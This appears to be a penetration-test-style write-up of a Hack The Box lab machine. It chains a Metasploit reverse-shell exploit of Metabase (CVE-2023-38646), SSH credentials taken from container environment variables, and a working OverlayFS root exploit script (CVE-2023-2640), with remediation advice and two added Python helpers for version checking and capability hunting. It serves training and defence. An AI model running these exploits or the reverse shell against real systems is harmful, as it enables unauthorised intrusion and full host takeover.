Analytics - Pentest Report
Executive Summary
HackTheBox contracted Otrashoui Cybersecurity Services™ to perform a Network Penetration Test of one of Hack The Box’s internal hosts to identify security weaknesses, determine the impact to HackTheBox, and provide remediation recommendations.
Approach
Otrashoui Cybersecurity Services™ performed testing under a “black box” approach without credentials or any prior knowledge of HackTheBox’s environment.
Scope
Host | Description |
---|---|
IP | ?? |
Assessment Overview and Recommendations
During the penetration test against HackTheBox, Otrashoui Cybersecurity Services™ identified two (2) findings that affect HackTheBox’s information security posture.
The first finding involved a vulnerable version of the Metabase application. This vulnerability allows unauthenticated users to remotely execute commands on the underlying server. This issue is fixed in the latest Metabase version.
The other finding involved a vulnerable version of the Linux kernel on an Ubuntu system. This vulnerability allows low-privileged users to gain full administrative access on the system. Updating the system to the latest Linux kernel will fix the issue.
Summary of Findings
The following table presents a summary of findings by severity level:
High | Medium | Low | Total |
---|---|---|---|
2 | 0 | 0 | 2 |
Below is a high-level overview of each finding identified during the assessment. These findings are covered in depth in the Technical Findings Details section of this report:
Name | Severity |
---|---|
Vulnerable Software (CVE-2023-38646) | High |
Vulnerable Linux Kernel (CVE-2023-2640) | High |
Exploitation Walkthrough
During the course of the assessment, Otrashoui Cybersecurity Services™ was able to gain a foothold and compromise the in-scope host. The steps below demonstrate how the tester went from unauthenticated user to administrative access on the host.
Detailed Walkthrough
- The Metabase instance was vulnerable to CVE-2023-38646, a remote code execution vulnerability.
- The Metabase instance was running in a Docker container, but SSH credentials exposed in the container's environment variables (password re-use) gave access to the underlying host.
- The host was running a vulnerable version of the Linux kernel (CVE-2023-2640), which allowed unprivileged users to escalate privileges and get full administrative access on the system.
Reproduction Steps
In the following code snippets, [...] is used to discard irrelevant output in the current context. Additionally, lines starting with the $ character indicate a system command typed by the tester.
Using the Metasploit module to exploit the vulnerability, and achieve remote code execution on the system:
```text
msf6 > search metabase
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/metabase_setup_token_rce 2023-07-22 excellent Yes Metabase Setup Token RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/metabase_setup_token_rce
msf6 > use 0
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/metabase_setup_token_rce) > set LHOST tun0
LHOST => 10.10.14.93
msf6 exploit(linux/http/metabase_setup_token_rce) > set RHOSTS 10.129.135.20
RHOSTS => 10.129.135.20
msf6 exploit(linux/http/metabase_setup_token_rce) > set VHOST data.analytical.htb
VHOST => data.analytical.htb
msf6 exploit(linux/http/metabase_setup_token_rce) > set RPORT 80
RPORT => 80
msf6 exploit(linux/http/metabase_setup_token_rce) > run
[*] Started reverse TCP handler on 10.10.14.93:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 0.46.6
[+] Found setup token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f
[*] Sending exploit (may take a few seconds)
[*] Command shell session 1 opened (10.10.14.93:4444 -> 10.129.135.20:54808) at 2023-10-08 11:09:47 +0200
whoami ; uname -a ; ip a
metabase
Linux 7b083230dd9d 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 Linux
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever
```
SSH credentials are present in environment variables:
```text
7b083230dd9d:/$ env
[...]
META_USER=metalytics
META_PASS=An4lytics_ds20223#
[...]
```
With these, it is possible to get access to the analytics host:
```text
$ ssh metalytics@analytical.htb
[...]
metalytics@analytics:~$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
```
This kernel version is vulnerable on Ubuntu systems: a flaw in Ubuntu's OverlayFS implementation allows an unprivileged user to create executables that carry privileged file capabilities, which can then be used to execute commands as the superuser.
Using the proof of concept from this GitHub repository:
```sh
#!/bin/sh
set -e
unshare -rm sh -c "mkdir -p l u w m ;
cp /usr/bin/python3 l/ ;
setcap cap_setuid+eip l/python3 ;
mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m ;
touch m/*"
u/python3 -c 'import os;os.setuid(0);os.system("id")'
```
This script uses the vulnerability to produce a copy of /usr/bin/python3 (u/python3) that carries the cap_setuid file capability, so it is allowed to call the setuid() system call and execute commands as root:
```text
metalytics@analytics:~$ chmod +x exp.sh
metalytics@analytics:~$ id
uid=1000(metalytics) gid=1000(metalytics) groups=1000(metalytics)
metalytics@analytics:~$ ./exp.sh
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)
```
Remediation Summary
Short Term
- Update Metabase to the latest version.
- Update the kernel, or apply security patches distributed by Ubuntu.
Medium Term
- Consider implementing an enterprise password manager to avoid password re-use.
Long Term
- Perform periodic vulnerability scans.
Technical Findings Details
1. Vulnerable Software (CVE-2023-38646) - High
CWE | 1395 |
---|---|
CVSS 3.1 Score | 9.8 |
Affected Application | http://data.analytical.htb |
Description | The application is using a vulnerable version of the Metabase software, granting remote code execution capabilities. |
Impact | An attacker can use this vulnerability to get remote access to the underlying server, potentially getting access to sensitive files or compromising other hosts in the internal network. |
Remediation | Update Metabase to the latest version. |
External References | https://blog.calif.io/p/reproducing-cve-2023-38646-metabase |
Evidence
Using the Metasploit module to exploit the vulnerability:
```text
msf6 > search metabase
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/metabase_setup_token_rce 2023-07-22 excellent Yes Metabase Setup Token RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/metabase_setup_token_rce
msf6 > use 0
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/metabase_setup_token_rce) > set LHOST tun0
LHOST => 10.10.14.93
msf6 exploit(linux/http/metabase_setup_token_rce) > set RHOSTS 10.129.135.20
RHOSTS => 10.129.135.20
msf6 exploit(linux/http/metabase_setup_token_rce) > set VHOST data.analytical.htb
VHOST => data.analytical.htb
msf6 exploit(linux/http/metabase_setup_token_rce) > set RPORT 80
RPORT => 80
msf6 exploit(linux/http/metabase_setup_token_rce) > run
[*] Started reverse TCP handler on 10.10.14.93:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 0.46.6
[+] Found setup token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f
[*] Sending exploit (may take a few seconds)
[*] Command shell session 1 opened (10.10.14.93:4444 -> 10.129.135.20:54808) at 2023-10-08 11:09:47 +0200
whoami ; uname -a ; ip a
metabase
Linux 7b083230dd9d 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 Linux
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever
```
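The Metasploit check above reported Metabase 0.46.6. The following is an added example, not part of this report or of Metabase, that turns the remediation ("update Metabase") into a reproducible version check: it parses a Metabase version string and compares it with the patched release of its series. The fixed-version list is my recollection of the vendor advisory for CVE-2023-38646 and should be verified against it.

```python
from typing import Tuple

# Patched release (patch, hotfix) for each affected Metabase series. OSS versions start
# with 0, Enterprise with 1; the numbers after that are shared. Assumption: this list
# matches the vendor advisory for CVE-2023-38646; verify before relying on it.
FIXED_PATCH = {46: (6, 1), 45: (4, 1), 44: (7, 1), 43: (7, 2)}


def parse_version(version: str) -> Tuple[int, int, int, int]:
    """Turn '0.46.6' into (0, 46, 6, 0) and 'v1.46.6.1' into (1, 46, 6, 1)."""
    parts = [int(p) for p in version.strip().lstrip("v").split(".")]
    if len(parts) < 3 or len(parts) > 4:
        raise ValueError(f"unexpected Metabase version string: {version!r}")
    edition, series, patch, hotfix = (parts + [0])[:4]
    return edition, series, patch, hotfix


def is_vulnerable_cve_2023_38646(version: str) -> bool:
    """True when the setup-token RCE fix is absent from this release."""
    _edition, series, patch, hotfix = parse_version(version)
    if series > 46:            # later series were cut after the fix landed
        return False
    fix = FIXED_PATCH.get(series)
    if fix is None:            # series older than 0.43 received no backport
        return True
    return (patch, hotfix) < fix


def assess(version: str) -> str:
    """One-line verdict suitable for a finding table."""
    edition, series, _patch, _hotfix = parse_version(version)
    if not is_vulnerable_cve_2023_38646(version):
        return f"{version}: patched for CVE-2023-38646"
    fix = FIXED_PATCH.get(series)
    target = f"{edition}.{series}.{fix[0]}.{fix[1]}" if fix else "the current release"
    return f"{version}: VULNERABLE to CVE-2023-38646, upgrade to {target}"


if __name__ == "__main__":
    # Version reported by the Metasploit check in the evidence above.
    print(assess("0.46.6"))
```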
2. Vulnerable Linux Kernel (CVE-2023-2640) - High
CWE | 1395 |
---|---|
CVSS 3.1 Score | 7.8 |
Affected Host | analytics |
Description | The Linux kernel version 6.2.0 on the Ubuntu distribution has a vulnerable component (OverlayFS) that allows unprivileged users to gain root access. |
Impact | An unprivileged attacker already present on the local system can use this vulnerability to escalate privileges and gain full administrative access on the host. |
Remediation | Update the kernel, or apply security patches distributed by Ubuntu. |
External References | https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability |
Evidence
Using the proof of concept from this GitHub repository:
```sh
#!/bin/sh
set -e
unshare -rm sh -c "mkdir -p l u w m ;
cp /u*/b*/p*3 l/ ;
setcap cap_setuid+eip l/python3 ;
mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m ;
touch m/*"
u/python3 -c 'import os;os.setuid(0);os.system("id")'
```
Run the exploit script:
```text
metalytics@analytics:~$ chmod +x exp.sh
metalytics@analytics:~$ id
uid=1000(metalytics) gid=1000(metalytics) groups=1000(metalytics)
metalytics@analytics:~$ ./exp.sh
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)
```
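The proof of concept above leaves a durable artefact: an executable carrying the cap_setuid file capability inside a user-writable directory (u/python3 under the user's home). The following is an added example for responders, not part of this report, that hunts for such files by parsing `getcap -r` output in both libcap output styles; the sample lines, trusted path prefixes and capability list are my assumptions.

```python
import re
import subprocess
from typing import List, Set, Tuple

# Locations where file capabilities are expected to come from packages (assumption).
# A privilege-granting capability on a file outside these paths deserves a look.
TRUSTED_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/lib/", "/lib64/", "/snap/")
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override"}

# Constructed sample of `getcap -r /` output: two ordinary package binaries plus the
# capability-bearing python3 copy the OverlayFS PoC leaves in its upper directory.
# The first line uses the newer libcap style, the second the older "path = caps" style.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/arping = cap_net_raw+ep
/home/metalytics/u/python3 cap_setuid=eip
"""


def parse_getcap_line(line: str) -> Tuple[str, Set[str]]:
    """Split one getcap line into (path, capability names) for either output style."""
    line = line.rstrip()
    if " = " in line:                      # older libcap: "/path = cap_a,cap_b+ep"
        path, caps = line.rsplit(" = ", 1)
    else:                                  # newer libcap: "/path cap_a,cap_b=ep"
        path, caps = line.rsplit(" ", 1)
    return path, set(re.findall(r"cap_[a-z_]+", caps))


def suspicious_caps(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (path, dangerous caps) for capability-bearing files outside trusted paths."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        path, caps = parse_getcap_line(line)
        found = sorted(caps & DANGEROUS)
        if found and not path.startswith(TRUSTED_PREFIXES):
            hits.append((path, found))
    return hits


def scan_host() -> List[Tuple[str, List[str]]]:
    """Run the check on the live system; needs libcap's getcap on PATH."""
    out = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout
    return suspicious_caps(out.splitlines())


if __name__ == "__main__":
    for path, caps in suspicious_caps(SAMPLE_GETCAP.splitlines()):
        print(f"suspicious: {path} carries {','.join(caps)}")
```

A clean host returns an empty list from scan_host(); the remaining hits point at files to quarantine and at the user whose home they sit in.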